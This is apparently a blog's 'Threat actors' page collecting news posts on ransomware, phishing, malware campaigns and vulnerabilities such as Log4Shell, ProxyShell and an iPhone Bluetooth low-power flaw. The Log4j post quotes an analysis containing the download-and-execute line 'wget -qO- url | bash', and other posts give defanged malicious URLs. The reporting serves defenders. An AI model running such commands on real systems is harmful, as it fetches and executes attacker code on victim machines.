Search This Blog

Showing posts with label Threat actors. Show all posts

The Impact of Geopolitical Turmoil on the Cybersecurity Threat Landscape

 

With over 10 terabytes of data stolen each month, ransomware remains one of the top threats in the new report, with phishing emerging as the most common initial vector of such attacks. Other threats that rank high alongside ransomware are attacks on availability, also known as Distributed Denial of Service (DDoS) attacks. 

However, geopolitical situations, particularly Russia's invasion of Ukraine, have acted as a game changer for the global cyber domain during the reporting period. While the number of threats continues to rise, we are also seeing a wider range of vectors emerge, such as zero-day exploits and AI-enabled disinformation, and deepfakes. As a result, more malicious and widespread attacks with greater destructive potential emerge.

EU Agency for Cybersecurity Executive Director, Juhan Lepassaar stated that “Today’s global context is inevitably driving major changes in the cybersecurity threat landscape. The new paradigm is shaped by the growing range of threat actors. We enter a phase which will need appropriate mitigation strategies to protect all our critical sectors, our industry partners, and therefore all EU citizens.”

During the reporting period of July 2021 to July 2022, the most prominent threat actors were state-sponsored, cybercrime, hacker-for-hire actors, and hacktivists.

Based on an analysis of the proximity of cyber threats to the European Union (EU), the number of incidents in the NEAR category has remained high over the reporting period. This category includes affected networks, systems, and networks that are controlled and ensured within EU borders. It also includes the affected population within the EU's borders.

Threat assessment across industries

The threat distribution across sectors, which was added last year, is an important aspect of the report because it contextualizes the threats identified. This analysis shows that no industry is immune. It also reveals nearly 50% of threats target the following categories; public administration and governments (24%), digital service providers (13%), and the general public (12%) while the other half is shared by all other sectors of the economy.

ENISA classified threats into eight categories. The frequency and severity of these threats determine how prominent they remain.
  • Ransomware: 60% of affected organizations may have paid ransom demands
  • Malware: 66 disclosures of zero-day vulnerabilities observed in 2021
  • Social engineering: Phishing remains a popular technique but we see new forms of phishing arising such as spear-phishing, whaling, smashing, and vishing
  • Threats against data: Increasing in proportionally to the total of data produced
  • Disinformation – misinformation: Escalating AI-enabled disinformation, deepfakes, and disinformation-as-a-service
  • Supply chain targeting: Third-party incidents account for 17% of the intrusions in 2021 compared to less than 1% in 2020
Emerging contextual trends:
  • Cunning threat actors are turning to zero-day exploits to accomplish their goals.
  • Since the Russia-Ukraine war, a new wave of hacktivism has emerged.
  • DDoS attacks are becoming more sophisticated as they migrate to mobile networks and the Internet of Things (IoT), which are now being used in cyber warfare.
  • Deepfakes and disinformation powered by AI By flooding government agencies with fake content and comments, the proliferation of bots modeling personas can easily disrupt the "notice-and-comment" rule-making process as well as community interaction.
  • Threats against availability: The largest denial of service (DDoS) attack ever was launched in Europe in July 2022
  • Internet: the destruction of infrastructure, outages, and rerouting of internet traffic.
A threat impact assessment reveals five types of impact: reputational, digital, economic, physical, and social damage. Although the impact of most incidents is unknown because victims fail to disclose information or the information is incomplete.

The motivation of the top threats was examined. According to the findings, ransomware is solely motivated by monetary gain. Geopolitics, with threats such as espionage and disruptions, can provide motivation for state-sponsored groups. Ideology may also be the driving force behind hacktivist cyber operations.

 Cyberattacks Against US Hospitals are Growing Rapidly

Ransomware has emerged as one of the most challenging issues in cybersecurity and a threat to industries worldwide. With ransomware, hackers extort businesses and organizations by breaking into and frequently holding computers and files hostage. However, it can have a particularly negative impact on patient care when it affects hospital networks and cascades across the nation. 

According to The Des Moines Register, ransomware hackers targeted MercyOne in the first few days of October as part of a more significant attack that resulted in hospital-wide outages at many other health systems. It was unclear how many of the 140 hospitals under the management of CommonSpirit Health, a nonprofit healthcare organization with headquarters in Chicago, were impacted, and the organization declined to disclose the number.

Since having the tonsils removed, Kelley Parsi brought her 3-year-old son to a hospital in Des Moines, Iowa, where she anticipated that the staff would treat his pain and dehydration and then send him home. She claimed that instead, the excursion turned into one of her most terrifying days ever.

She was told by the resident doctor that he had accidentally given him five times what was prescribed, due to the computer system that automatically calculated medication doses not functioning. Later, she found out that part of the hospital's digital equipment had been disabled by a cyberattack. While her son's body digested the overdose, she waited several hours in fear.

In addition, CommonSpirit, which operates more than 140 hospitals in the United States, opted not to disclose the number of its locations experiencing delays. However, a number of hospitals have reported being impacted, including Virginia Mason Franciscan Health in Seattle, certain St. Luke's hospitals in Texas, and CHI Memorial Hospital in Tennessee.

According to Brett Callow, an expert at the cybersecurity company Emsisoft, ransomware has been used to hack into 19 major hospital chains in the United States this year.

Due to patient confidentiality, MercyOne, Parsi's hospital, declined to comment on her condition. "It was dedicated to delivering safe, high-quality treatment for all patients we serve in their time of need," a representative said in a statement.

The U.S. government lists health care as one of 16 important infrastructure sectors. Hackers view healthcare organizations as prime targets.

However, a significant assessment by the government Cybersecurity and Infrastructure Security Agency and a poll of healthcare IT experts concluded that a ransomware attack on a hospital puts more strain on its capabilities generally and raises death rates there.

Cyber-attacks on Port of Los Angeles Doubled Since Pandemic

 

According to recent research, one of the world's biggest ports has witnessed an unusual spike in cyber-attacks since the outbreak began. The Port of Los Angeles' executive director, Gene Seroka, told the BBC World Service over the weekend that the facility receives roughly 40 million attacks every month. 

"Our intelligence shows the threats are coming from Russia and parts of Europe. We have to stay steps ahead of those who want to hurt international commerce. We must take every precaution against potential cyber-incidents, particularly those that could threaten or disrupt the flow of cargo,” he further added. 

Ransomware, malware, spear phishing, and credential harvesting attacks appear to be among the threats aimed against the facility, which is the busiest in the Western Hemisphere. The goal seems to harm the US economy in many situations, however, profits through extortion and data theft will also be a factor. 

Such dangers, if not adequately managed, can potentially exacerbate COVID-era supply chain snarls. Seroka said that port blockages will not be cleared completely until next year, even though the number of container ships waiting more than two days to offload has reportedly reduced from 109 in January to 20 today. 

"The past two years have proven the vital role that ports hold to our nation's critical infrastructure, supply chains and economy. It's paramount we keep the systems as secure as possible," Seroka expressed. 

The challenge is so acute that the port established one of the world's first Cyber Resilience Centers in collaboration with the FBI. It provides a single site for port stakeholders such as shipping corporations to receive, evaluate, and exchange threat intelligence. 

Ports have become such a popular target for cyber-criminals, particularly those aiming to undermine operations and extort businesses, due to their strategic significance to global trade.

Even When Switched Off, iPhones are Vulnerable to Attack

 

The way Apple combines autonomous wireless technology such as Bluetooth, Near Field Communication (NFC), and Ultra-wideband (UWB) in the device, researchers determined that it could be exploited by attackers to target iPhones even when they are turned off. 

Such features—which have access to the iPhone's Secure Element (SE), which stores sensitive information—stay on even when modern iPhones are turned off, as per a team of researchers from Germany's Technical University of Darmstadt. This allows attackers to "load malware onto a Bluetooth chip that is performed when the iPhone is off," according to a research study titled "Evil Never Sleeps: When Wireless Malware Stays On After Turning Off iPhone."

As per Jiska Classen, Alexander Heinrich, Robert Reith, and Matthias Hollick of the university's Secure Mobile Networking Lab, attackers can gain access to secure information such as a user's credit card data, banking details, or even digital car keys on the device by compromising these wireless features. Researchers noted that while the risk is real, exploiting the circumstance is not that simple for would-be attackers. Threat actors will still need to load malware onto the iPhone when it is turned on for subsequent execution when it is turned off. This would require system-level access or remote code execution (RCE), which they might gain by exploiting known weaknesses like BrakTooth. 

The main cause of the problem is the existing implementation of low power mode (LPM) for wireless chips on iPhones. The experts distinguished between the LPM which these processors employ and the power-saving program that iPhone users can use to save battery life. Because LPM support is built into the iPhone's hardware, it cannot be deleted with system upgrades, and has "a long-term impact on the broader iOS security paradigm," according to the researchers.

Analysts disclosed their findings to Apple before publishing the study, but they claim the company did not respond to the difficulties revealed by their findings. It is recommended that one possible solution would be for Apple to implement "a hardware-based switch to disconnect the battery" so that these wireless parts would not have power while an iPhone is turned off.

 Is Malware Analysis Challenging?

 

To minimize the likelihood and possible effect of cyberattacks, security teams require greater detection and analytic capabilities. Despite this, companies are limited in their ability to detect and respond to advanced and targeted assaults due to a lack of qualified cybersecurity personnel, an overabundance of tools, and broken processes. 

To answer these questions, OPSWAT has released two new solutions which aim to minimize the time and effort required for manual analysis, eliminate the requirement for specialized expertise, and break down barriers across diverse tools and workflows: 

  • OPSWAT Sandbox 
  • MetaDefender Malware Analyzer

"Malware analysis is a vital tool for management teams looking to go beyond check-the-box compliance procedures toward the proactive threat management and crisis response programs," said OPSWAT CEO Benny Czarny. "Organizations are undertaking a change to keep ahead of skilled adversaries which are attacking vital infrastructure to remain abreast of these attacks." 

These tools work together to make malware analysis more intelligent, resulting in faster and more accurate results with less manual effort. MetaDefender Malware Analyzer is a unified, fully integrated platform for malware tool integration, analysis orchestration, playbook automation, and aggregated reporting across several analysis tools.

Finding, training, and retaining malware analysts is difficult for businesses — The most difficult aspect of hiring new employees is that there are not enough qualified prospects. As a result, the vast majority of businesses rely on their staff to learn malware analysis skills, despite the fact, almost half of them say it's difficult to find good training programs. Furthermore, these firms recognize the malware analysis function is understaffed - more than half reported worker burnout in the last 12 months, and far more than half reported active recruitment of existing teams. 

Malware analysis technologies are ineffective due to a lack of automation, integration, and accuracy  The lack of automated tools which are not integrated is the biggest problem with malware analysis tools. Without these features, malware analysis might devolve into a time-consuming and error-prone manual procedure involving many tools and workflows. Accuracy is the most critical criterion to consider when assessing malware analysis tools — only around a quarter of businesses are confident in their capacity to detect, investigate, and resolve malware attacks.

Cuba Ransomware Hacked Microsoft Exchange Servers

 

To get early access to business networks and encrypt devices, the Cuba ransomware campaign is exploiting Microsoft Exchange vulnerabilities. The ransomware group is known as UNC2596, and the ransomware itself is known as COLDDRAW, according to cybersecurity firm Mandiant. 

Cuba is the most popular name for malware. Cuba is a ransomware campaign that began in late 2019, and while it started slowly, it gained traction in 2020 and 2021. In December 2021, the FBI issued a Cuba ransomware notice, stating that the group has infiltrated 49 critical infrastructure firms in the United States. Researchers indicate that the Cuba operation predominantly targets the United States, followed by Canada, according to a new analysis by Mandiant. Since August 2021, the Cuba ransomware gang has been using Microsoft Exchange vulnerabilities to launch web shells, RATs, and backdoors to gain a foothold on the target network. 

"Mandiant has also identified the exploitation of Microsoft Exchange vulnerabilities, including ProxyShell and ProxyLogon, as another access point leveraged by UNC2596 likely as early as August 2021," explains Mandiant in a new report. 

Cobalt Strike or the NetSupport Manager remote access tool is among the backdoors planted, although the organisation also utilises their own 'Bughatch', 'Wedgecut', 'eck.exe', as well as Burntcigar' tools. 
  • Wedgecut comes in the form of an executable named “check.exe,” which is a reconnaissance tool that enumerates the Active Directory through PowerShell.
  • Bughatch is a downloader that fetches PowerShell scripts and files from the C&C server. To evade detection, it loads in memory from a remote URL.
  • Burntcigar is a utility that can terminate processes at the kernel level by exploiting a flaw in an Avast driver, which is included with the tool for a “bring your own vulnerable driver” attack.
Finally, Termite is a memory-only dropper that downloads and loads the payloads mentioned earlier. However, this tool has been seen in campaigns by a variety of threat groups, indicating that it is not exclusively utilised by Cuba threat actors. 

Threat actors use stolen account credentials obtained with the widely available Mimikatz and Wicker tools to elevate access. They then use Wedgecut to undertake network reconnaissance before using RDP, SMB, PsExec, and Cobalt Strike to move laterally. Bughatch is then loaded by Termite, followed by Burntcigar, which disables security tools and creates the foundation for data exfiltration and file encryption. For the exfiltration process, the Cuba gang does not use cloud services, instead transfers everything to its own private infrastructure. 

Changing Operations 

Cuba ransomware teamed up with spammers behind the Hancitor malware in May 2021 to get access to corporate networks via DocuSign phishing emails. Since then, Cuba's operations have shifted to focus on vulnerabilities in public-facing services, such as the Microsoft Exchange ProxyShell and ProxyLogon flaws. Because security updates to fix the exploited vulnerabilities have been available for months, this move makes the assaults more potent but also easier to prevent. 

Once there are no more valuable targets running unpatched Microsoft Exchange servers, the Cuba operation will likely shift its focus to other vulnerabilities. This means that adopting accessible security updates as soon as they are released by software providers is critical in maintaining a strong security posture against even the most sophisticated threat actors.

Several Magento Sites were Targeted by a Surge of MageCart Attacks

 

A large number of online stores using the Magento 1 e-commerce system were targeted by a web skimmer, according to Sansec, an eCommerce security consultancy. 

The crawler detected roughly 374 infections in a single day, indicating an onslaught. The infection was downloaded from the domain naturalfreshmall[.]com, which is presently offline. The threat operators' purpose was to steal credit card information from consumers at the targeted online retailers.

An attacker often uses a security flaw in the Quickview plugin to insert rogue admin users into susceptible Magento stores as the initial intrusion vector. Under this scenario, however, the flaw was exploited to add a default value resulting in the database being updated with a file carrying a simple backdoor. By just surfing the Magento login page, the validation requirements for prospective consumers would be used to initiate the code execution. 

By implementing a default value to the customer_ eav_attribute table, misuse is possible. The host app is tricked into creating a malicious entity, which is then utilized to generate a basic backdoor (api 1.php). As per Sansec, the intruders installed 19 backdoors on the hacked system, which means the affected sites must remove all of them to avoid being targeted in future attacks.

Although thousands of merchants continue to use it, the Magento 1 platform has hit End-of-Life, and Adobe no longer provides security upgrades for the same. As a result, the sites are accessible to a wide range of cyberattacks, putting the clients' sensitive information at risk. These details usually include credit card numbers, mailing addresses, names, phone numbers, and email addresses, as well as anything else required to complete an online order.

All Magento administrators should make sure it is running the most current edition of the platform and upgrade if it is on an older, unsupported version.

BATLOADER and Atera Agent are Being Distributed Through an SEO Poisoning Campaign

 

A new SEO poisoning campaign is underway, with the purpose of infecting targeted systems with the BATLOADER and Atera Agent malware. It appears to be aimed at professionals looking to download productivity applications such as TeamViewer, Zoom, or Visual Studio. SEO poisoning is a tactic used by hackers in cyberattacks to build up malicious websites loaded with certain keywords that visitors typically seek up in search engines. Then they use various SEO (Search Engine Optimization) techniques to make these appear prominently in search results. 

According to a report by Mandiant researchers, in this malicious SEO campaign, threat actors attack legitimate websites in order to plant compromised files or URLs. Users are thus routed to websites that host malware posing as well-known applications. 

“The threat actor used “free productivity apps installation” or “free software development tools installation” themes as SEO keywords to lure victims to a compromised website and to download a malicious installer. The installer contains legitimate software bundled with the BATLOADER malware. The BATLOADER malware is dropped and executed during the software installation process.” said the researchers. 

“This initial BATLOADER compromise was the beginning of a multi-stage infection chain that provides the attackers with a foothold inside the target organization. Every stage was prepared for the next phase of the attack chain. And legitimate tools such as PowerShell, Msiexec.exe, and Mshta.exe allow proxy execution of malicious payloads to avoid detection,” they added. 

A file called "AppResolver.dll" was discovered in the attack chain as a significant sample. This DLL sample is an internal component of Microsoft's Windows Operating System, but it contains malicious VBScript inserted in such a way that the code signature stays valid. When run on its own, the DLL sample does not execute the VBScript. When ran with Mshta.exe, Mshta.exe locates and executes the VBScript without error. 

This vulnerability is similar to CVE-2020-1599 in that the PE Authenticode signature remains valid after appending HTA compatible scripts signed by any software developer. These PE+HTA polyglot (.hta files) can be used by Mshta.exe to circumvent security solutions that rely on Microsoft Windows code signing to determine whether or not files are trusted. 

In this case, researchers discovered that arbitrary script data was attached to the signature section of a legitimately signed Windows PE file at the end of the ASN.1. As long as the file extension is not '.hta,' the resulting polyglot file retains a valid signature. If this polyglot file is executed with Mshta.exe, the script contents will be successfully executed since Mshta.exe will skip the PE's bytes, locate the script at the end, and execute it.

Attackers are Using Shipment-Delivery Scams to Lure Victims to Install Trickbot

 

Researchers discovered that threat actors are increasingly deploying scams that impersonate package couriers such as DHL or the United States Postal Service in authentic-looking phishing emails to trick victims into downloading credential-stealing or other malicious payloads. Separately on Thursday, researchers from Avanan, a CheckPoint firm, and Cofense identified current phishing scams that involve malicious links or attachments aimed at infecting computers with Trickbot and other harmful malware. 

Researchers stated the campaigns relied separately on faith in commonly used shipping methods and employees' familiarity with receiving emailed documents linked to shipments to try to provoke further action to hack corporate systems. 

The emails used to send Trickbot in recent delivery service-related campaigns included official USPS branding as well as features such as third-party social-media logos from Facebook, Instagram, LinkedIn, and Twitter, "to make the email look even more credible," researchers said. The emails, however, have a sender address that is totally irrelevant to the USPS, which might easily have alerted someone to their shady motive, they claim.

If the bait works and a user clicks on the link to the alleged invoice, they are routed to a domain that downloads a ZIP file, hxxps:/www.zozter[.]com/tracking/tracking[.]php. The unzipped file is an XMLSM spreadsheet called “USPS_invoice_EA19788988US.xlsm” that requires editing due to document protection — a common approach used in fraudulent email campaigns. If a victim goes so far as to enable editing, a malicious PowerShell process is launched, which eventually downloads Trickbot. 

According to Avanan's Jeremey Fuchs, cybersecurity researcher, and analyst, the DHL spoofing assault likewise includes what threat actors want victims to believe is a shipping document, but this time in the form of an attachment. “By spoofing a popular brand, the hackers are hoping to target vulnerable users who are accustomed to checking for shipping notifications,” he wrote. 

This practice has become so widespread that DHL has achieved the dubious distinction of replacing Microsoft at the top of Check Point Software's list of brands most mimicked by threat actors in the fourth quarter of 2021. Scams involving the courier accounted for 23% of all phishing emails during that time period, but the company's name was associated with only 9% of scams in the third quarter. 

Researchers attributed the increase in package delivery frauds to a number of variables. Spoofing DHL made perfect sense in the fourth quarter of last year during the hectic holiday shopping season, according to Jeremey, in a study on the latest DHL-related fraud published Thursday.

Emotet Spam Campaigns Use Unconventional IP Addresses to Avoid Detection

 

Trend Micro discovered Emotet spam campaigns that used hexadecimal and octal representations of IP addresses to avoid detection using pattern matching. Both processes rely on social engineering to deceive users into enabling document macros and automate malware execution. When these standards are received, operating systems (OS) automatically transform the data to the dotted decimal quad representation in order to commence the request from remote servers.

Users and enterprises are advised to detect, block, and enable the appropriate security measures to prevent compromise while using Emotet for second-stage malware transmission such as TrickBot and Cobalt Strike. 

Emotet first surfaced in 2014, when researchers found a relatively simple banking Trojan transmitted via phishing emails. It evolved several times over the years into a Malware-as-a-Service botnet, allowing access to compromised computers to those willing to pay. Unfortunately, there were a plethora of them, including ransomware gangs like Ryuk and the data-stealing malware Trickbot. These immediately took advantage of the initial access provided by Emotet, picking and choosing which victims to target with subsequent payloads. 

According to Europol, Emotet's capability to move laterally among devices on a network made it one of the most durable pieces of malware detected in recent years. In reality, it has become one of the most serious threats researchers have seen in recent years, constantly ranking among the top ten campaigns detected, with over 1.6 million victim machines, according to the DoJ. 

The samples researchers discovered begin with an email-attached document that employs Excel 4.0 Macros, an antiquated technology intended to automate repetitive processes in Excel that malicious actors have exploited to distribute malware. In this scenario, abusing the feature allows the malware to execute once the document is opened using the auto-open macro. Carets are used to obfuscate the URL, and the host contains a hexadecimal representation of the IP address. 

When the macro is run, it invokes cmd.exe > mshta.exe with the URL containing the hex representation of the IP address as an argument, which downloads and executes HTML application (HTA) code from the remote host. 

Between November and December 2021, traces of Emotet were seen arbitrarily dropping Cobalt Strike beacons. However, during this year, operators were notably more picky about which targets the beacons were dropped on. Evasion strategies like this could be interpreted as proof that attackers are continuing to innovate in order to defeat pattern-based detection technologies. Furthermore, the atypical use of hexadecimal and octal IP addresses may result in evasion of current solutions reliant on pattern matching.

Because of a Flaw in Microsoft Defender, Threat Actors can Evade Detection

 

Threat actors were able to use a vulnerability in Microsoft Defender antivirus on Windows to learn about unscanned places and plant malware there. According to several users, the issue has existed for at least eight years and affects both Windows 10 21H1 and Windows 10 21H2. According to security researchers, the list of locations that are not scanned by Microsoft Defender are insecure and accessible to any local user. 

Windows Defender is an anti-malware component of Microsoft Windows. It was first made available as a free anti-spyware download for Windows XP, and it was then bundled with Windows Vista and Windows 7. It has evolved into a full antivirus solution, replacing Microsoft Security Essentials in Windows 8 and later editions. 

Local users, regardless of their permissions, can query the registry to see which paths Microsoft Defender is not permitted to check for malware or hazardous files. According to Antonio Cocomazzi, a SentinelOne threat researcher who reported the RemotePotato0 vulnerability, there is no protection for this sensitive information, and running the "reg query" command reveals everything that Microsoft Defender is not supposed to scan, whether it is files, folders, extensions, or processes. 

Like any other antivirus software, Microsoft Defender allows customers to specify which locations (local or network) on their PCs should be excluded from malware scanning. Exclusions are routinely used to keep antivirus software from interfering with the operation of legitimate apps that have been incorrectly labeled as malware. Because the list of scanning exceptions differs from user to user, this information is useful for an attacker on the system because it informs them where they can place harmful files without fear of being detected. 

However, Microsoft Defender Antivirus on Windows Server 2016 and Windows Server 2019 enrolls users in particular exclusions based on their server role. These exclusions are not included in the normal exclusion lists. Exclusions for operating system files and server roles are automated because Microsoft Defender Antivirus is incorporated into Windows Server 2016 and later. Custom exclusions, on the other hand, can be specified by users. 

Although a threat actor must have local access in order to obtain the Microsoft Defender exclusions list, this is far from a stumbling block. Many attackers are already accessing stolen business networks in quest of a technique that will allow them to go laterally as silently as possible. 

According to BleepingComputer, the flaw was discovered in May by researcher Paul Bolton. Because Microsoft has yet to patch the flaw, administrators should use group policy to set Microsoft Defender while installing their systems, according to security researchers.

Nanocore, Netwire, and AsyncRAT Distribution Campaigns Make Use of Public Cloud Infrastructure

 

Threat actors are actively leveraging Amazon and Microsoft public cloud services into their malicious campaigns in order to deliver commodity remote access trojans (RATs) such as Nanocore, Netwire, and AsyncRAT to drain sensitive information from compromised systems. The spear-phishing assaults, which began in October 2021, largely targeted companies in the United States, Canada, Italy, and Singapore, according to Cisco Talos researchers. 

These Remote Administration Tools (RATs) versions are loaded with features that allow them to take control of the victim's environment, execute arbitrary instructions remotely, and steal the victim's information. 

A phishing email with a malicious ZIP attachment serves as the initial infection vector. These ZIP archive files include an ISO image that contains a malicious loader in the form of JavaScript, a Windows batch file, or a Visual Basic script. When the initial script is run on the victim's machine, it connects to a download server to obtain the next step, which can be hosted on an Azure Cloud-based Windows server or an AWS EC2 instance.

Using existing legitimate infrastructure to assist intrusions is increasingly becoming part of an attacker's playbook since it eliminates the need for the attacker to host their own servers and may also be used as a cloaking strategy to avoid detection by security solutions. 

Collaboration and communication applications such as Discord, Slack, and Telegram have found a home in many infection chains in recent months to hijack and exfiltrate data from victim machines. Cloud platform abuse is a tactical extension that attackers may utilize as the first step into a large array of networks. 

"There are several interesting aspects to this particular campaign, and it points to some of the things we commonly see used and abused by malicious actors," said Nick Biasini, head of outreach at Cisco Talos. "From the use of cloud infrastructure to host malware to the abuse of dynamic DNS for command-and-control (C2) activities. Additionally, the layers of obfuscation point to the current state of criminal cyber activities, where it takes lots of analysis to get down to the final payload and intentions of the attack."

The use of DuckDNS, a free dynamic DNS service, to generate malicious subdomains to deliver malware is also noteworthy, with some of the actor-controlled malicious subdomains resolving to the download server on Azure Cloud while other servers function as C2 for the RAT payloads.

"Malicious actors are opportunistic and will always be looking for new and inventive ways to both host malware and infect victims. The abuse of platforms such as Slack and Discord as well as the related cloud abuse are part of this pattern," Biasini concluded.

Threat Actors use MSBuild to Execute Cobalt Strike Beacons

 

Malicious campaigns have recently been spotted abusing Microsoft Build Engine (MSBuild) to execute a Cobalt Strike payload on vulnerable machines. MSBuild, which was designed for the construction of Windows applications, uses a project file element called 'Tasks' to designate components that are executed during project building, and threat actors are misusing these Tasks to launch malicious code disguised as MSBuild. Renato Marinho, a Morphus Labs security researcher, and SANS Internet Storm Center (ISC) handler claims that two different malicious campaigns have been discovered utilizing MSBuild for code execution in the last week. 

MSBuild is a build tool that aids in the automation of the software development process, including source code compilation, packaging, testing, deployment, and documentation creation. It is feasible to build Visual Studio projects and solutions with MSBuild even if the Visual Studio IDE is not installed. MSBuild is a free and open-source software. MSBuild was previously included with the.NET Framework; however, starting with Visual Studio 2013, it is now included with Visual Studio. MSBuild is a functional replacement for the nmake utility, which is still used in projects created with previous Visual Studio editions. 

MSBuild operates on MSBuild project files, which have an XML syntax comparable to Apache Ant or NAnt. Despite the fact that the syntax is based on a well-defined XML schema, the fundamental structure and operation are comparable to the traditional Unix make utility: the user specifies what will be used (typically source code files) and what the result should be (typically a static library, DLL, or executable application), but the utility decides what to do and in which order to carry out the build. 

Threat actors often obtain access to the target environment through the use of a genuine remote desktop protocol (RDP) account, then employ remote Windows Services (SCM) for lateral movement and MSBuild to execute the Cobalt Strike Beacon payload. The malicious MSBuild project was created to build and run certain C# code, which then decodes and executes Cobalt Strike. 

Marinho further claims that after confirming that Beacon was used in the attack, he was able to decrypt the SSL-encrypted communication with the command and control (C&C) server. To avoid such attacks, the researcher recommends that enterprises use the Windows Defender Application Control (WDAC) policy to restrict Microsoft-signed applications that potentially allow the execution of other malware. MSBuild generates a list of these apps. 

“There is a note for MSBuild.exe, though, that if the system is used in a development context to build managed applications, the recommendation is to allow MSBuild.exe in the code integrity policies,” Marinho concluded.

Log4j Attackers Switch to Injecting Monero Miners via RMI

 

The most significant vulnerability identified recently has dominated the news over the last few days. The vulnerability, Log4Shell or LogJam and officially termed CVE-2021-44228, is an unauthenticated RCE flaw that permits total system control on systems running Log4j 2.0-beta9 through 2.14.1. 

As per BleepingComputer, some threat actors using the Apache Log4j vulnerability have switched from LDAP callback URLs to RMI, or even merged the two in a single request, to boost their chances of success. This is a big step forward in the ongoing attack, and firms should be aware of it as they try to secure all possible channels. 

For the time being, threat actors attempting to steal resources for Monero mining have identified this trend, but others may follow suit at any time. The majority of attacks targeting the Log4j "Log4Shell" vulnerability have used the LDAP (Lightweight Directory Access Protocol) service. 

Switching to the RMI (Remote Method Invocation) API may appear counter-intuitive at first sight, given that this technique is subject to additional checks and limitations. 

However, this is not always the case, and if we consider that some JVM (Java Virtual Machine) versions may not have strict rules, RMI may be a more easy way to do RCE (remote code execution) than LDAP. Furthermore, LDAP queries have become a well-established part of the infection chain, and defenders are keeping a close eye on them. Many IDS/IPS solutions, for example, currently filter requests using JNDI and LDAP, thus RMI may be disregarded for the time being. In some cases, Juniper recognised both RMI and LDAP services in the same HTTP POST request. 

As per the source, “This code invokes a bash shell command via the JavaScript scripting engine, using the construction “$@|bash” to execute the downloaded script. During the execution of this command, the bash shell will pipe the attacker’s commands to another bash process: “wget -qO- url | bash”, which downloads and executes a shell script on the target machine."

"This obfuscated script downloads a randomly named file of the form n.png, where n is a number between 0 and 7. Despite the purported file extension, this is actually a Monero cryptominer binary compiled for x84_64 Linux targets. The full script also adds persistence via the cron subsystem."

"A different attack, also detected by Juniper Threat Labs, tries both RMI and LDAP services in the same HTTP POST request in hopes that at least one will work. The LDAP injection string is sent as part of the POST command body. An exploit string in the POST body which is unlikely to succeed given most applications do not log the post body, which can be binary or very large, but by tagging the string as “username” in the JSON body, the attackers hope to exploit applications that will treat this request as a login attempt and log the failure."

Threat actors appear to be interested in mining Monero on hacked devices and promote it as an apparently innocent activity that "ain't going to hurt anyone else." The miner is built for x86 64 Linux systems and uses the cron subsystem for persistence. Even though the majority of attacks have targeted Linux systems. 

CheckPoint states to have discovered the first Win32 program to use Log4Shell, called 'StealthLoader.' by its investigators. 

The only way to combat what has become one of the most serious vulnerabilities in recent history is to upgrade Log4j to version 2.16.0. Administrators should also keep an eye on Apache's security area for new version announcements and execute them as soon as possible.

A Ransomware Attack Targeted Virginia Legislature Agencies and Commissions

 

A ransomware attack has caused the suspension of computer systems and websites for Virginia legislative agencies and commissions, including the Division of Capitol Police and the Division of Legislative Services, which is preparing bills and resolutions for the forthcoming General Assembly session. 

The attack started on Sunday at the Department of Legislative Automated Systems and has now expanded to practically all legislative branch websites, with the exception of the Legislative Information System on the General Assembly website. It has had no effect on state executive branch agencies. 

Virginia Governor Ralph Northam's spokesperson, Alena Yarmosky, said the governor has been briefed about the attack. The incident was communicated to the state's legislative leaders through email, who were informed that hackers attacked the state's computers. 

“Currently the bad guys have most of our critical systems locked up except for LIS,” Dave Burhop, director of the legislative IT agency, informed Senate and House of Delegates early on Monday morning. Capitol Police's website is unavailable, although spokesperson Joe Macenka stated that, "All of our critical communication systems are fine."

The attack employs ransomware, which a criminal organization implants in vital computer systems in order to extract money. The governor's office and Burhop both confirmed that the state had received a ransom note, but neither said what it contained. “The bad guys have left us a ransom note but details are scant and no amount of ransom has been specified yet,” Burhop said in the email to the House and Senate clerks. 

According to Senate Clerk Susan Schaar, the Department of Legislative Automated Services is collaborating with the Virginia Information Technologies Agency to resolve the problem. VITA provides assistance to approximately 60 agencies in the executive department of state government. The legislative IT sites are managed separately from the executive branch sites by the Department of Legislative Automated Systems, according to Yarmosky. “As such, VITA has very little knowledge of the system and security architecture or tools in place to address cyber-attacks.”

The Virginia Defense Force and the Virginia Department of Military Affairs reported in September that they were victims of a cyberattack in July. Attacks on local governments at the city, country, and state levels have netted ransomware groups millions of dollars. Experts say, at least 2,354 governments, healthcare facilities, and schools in the United States were hit with ransomware in 2020, according to The Washington Post.

PHP Re-Infectors: The Malware that Never Goes Away

 

Threat actors typically infect sites for monetary gain, to improve their SEO rankings for malware or spam campaigns, and for a variety of other objectives. If the malware is readily and swiftly removed, the attack's objective is defeated. Researchers discovered a modified index.php in the majority of cases of this form of infection. According to the researchers, it makes little difference if your site is not using WordPress; attackers will normally replace the index.php with an infected copy of the WordPress index.php file. 

The index.php file is a PHP file that serves as the entrance for any website or application. It is a template file that contains a variety of codes that will be given as PHP code. Because the system will be used by anyone with a simple HTML website, it will also be modified before delivery. 

It has also been observed that hundreds, if not thousands, of infected.htaccess files are dispersed throughout the website directories. This is intended to block custom PHP files or tools from executing on the site or to enable dangerous files to run if some mitigation is already in place. In rare cases, the attackers will leave a copy of the original index.php file entitled old-index.php or 1index.php on the server. In most situations, the infected files will have 444 permissions, and attempting to remove or clean those files directly is futile because the malware will immediately make a new infected duplicate. 

In rare situations, malware will be found in the memory of php-fpm. If index.php is still being recreated, run top to see if php-fpm is present. According to the researchers, you can try to delete OPCache, albeit this normally does not solve the problem. 

OPcache boosts PHP performance by keeping pre-compiled script bytecode in shared memory, eliminating the need for PHP to load and parse scripts on every request. As a result, malware can remain in OPcache after being removed from the site files or database. 

Though attackers are constantly seeking new ways to infect websites, there are several typical procedures that customers may take to reduce the number of infections. Put your website behind a firewall and change all admin passwords on a regular basis. This includes the admin dashboard, CPanel/FTP, ssh, and email; always keep all plugins, themes, and CMS up to date; and delete any unnecessary plugins or themes.

Threat Actors Use Phishing Kits to Target Mobile Devices

 

Few threat actors are inspired by political leaders, some others by mischief or malice, but most of them are only I'm the game for cash and money. To make sure the criminal activities are making a profit, balance bus required between potential payday running against time, risk, and the resources required. It's no surprise that many people use phishing scams as their go-to attacks, harmful emails can be used to attack many targets without much difficulty, threat actors can buy easily available phishing kits that work as a basic prerequisite for everything the hackers need for a campaign. 

After thorough research of phishing email traffic, experts found that most of these attacks follow the cash either to big financial firms or big tech companies. Apple, Facebook (now Meta), and Amazon were among the top brands targeted with the phishing campaign. "On the financial side, Charles Schwab was by far the most popular target, and was the most used brand URL overall, accounting for 13.5 percent of all cases. Chase Bank – an American subsidiary of JP Morgan Chase & Co – RBC Royal Bank and Wells Fargo were also widely used in phishing URLs," reports Helpnet security. 

